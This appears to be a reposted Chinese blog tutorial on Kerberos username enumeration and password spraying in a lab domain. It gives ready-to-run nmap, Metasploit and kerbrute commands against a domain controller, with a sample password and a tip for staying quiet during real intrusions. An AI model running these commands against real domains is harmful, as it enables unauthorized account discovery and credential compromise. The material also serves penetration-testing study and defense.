zoukankan      html  css  js  c++  java
  • 域内用户名枚举和密码喷洒

    域内用户名枚举和密码喷洒

    于Kerberos本身是一种基于身份认证的协议,所以也可对进行暴力破解或用户名枚举,并且不需要域用户下,只要攻击者所控的机器可以与域控的KDC正常通信即可(可以ping通)

    实验

    我这里实验主要是域控administrator、域成员af、还有一台非域机。

    nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='aufeng.com',userdb=C:UsersouDesktopuser.txt 10.0.0.3
    

    域是aufeng.com 字典位置在C:UsersouDesktop 域控ip是10.0.0.3

    msf 中类似的模块

    use auxiliary/gather/kerberos_enumusers
    set rhost [DC IP]
    set user_file 字典文件
    

    但实际渗透中,你拿下内网非域机子后,别人可能没安装nmap,而你要在人家的机子上安装nmap动静太大,所以直接上传个kerbrute工具是最好不过的。

    kerbrute工具下载地址

    kerbrute_windows_amd64.exe userenum --dc 10.0.0.3 -d aufeng.com user.txt
    

    分析
    Kerberos服务所在端口为88端口,采用tcp连接。为何能利用Kerberos域进行用户枚举?利用Kerberos错误代码进行判断

    三种状态的错误代码分别为:

    KDC_ERR_PREAUTH_REQUIRED-需要额外的预认证(启用
    KDC_ERR_CLIENT_REVOKED-客户端凭证已被吊销(禁用
    KDC_ERR_C_PRINCIPAL_UNKNOWN-在Kerberos数据库中找不到客户端(不存在
    

    爆破的时候直接抓包分析,并对10.0.0.3域控的所有请求筛选出来,可以看到如果存在这个域用户名就会有KDC_ERR_PREAUTH_REQUIRED的提示

    密码喷洒攻击

    其实就是内网信息收集后,用同一个密码去爆破不同的用户名,去碰撞。实战这招屡试屡爽

    kerbrute_windows_amd64.exe passwordspray --dc 10.0.0.3 -d aufeng.com user.txt Ou123456
    
  • 相关阅读:
    L1-061 新胖子公式 (10 分)
    L1-060 心理阴影面积 (5 分)
    L1-059 敲笨钟 (20 分)
    Linux高性能服务器编程—进程池和线程池
    epoll系列系统调用
    18.5.2 多线程并发服务器端的实现
    10.4 基于多任务的并发服务器
    侯捷C++(complex类)
    Qt 事件机制
    C++篇49问49答
  • 原文地址:https://www.cnblogs.com/tomyyyyy/p/15192349.html
Copyright © 2011-2022 走看看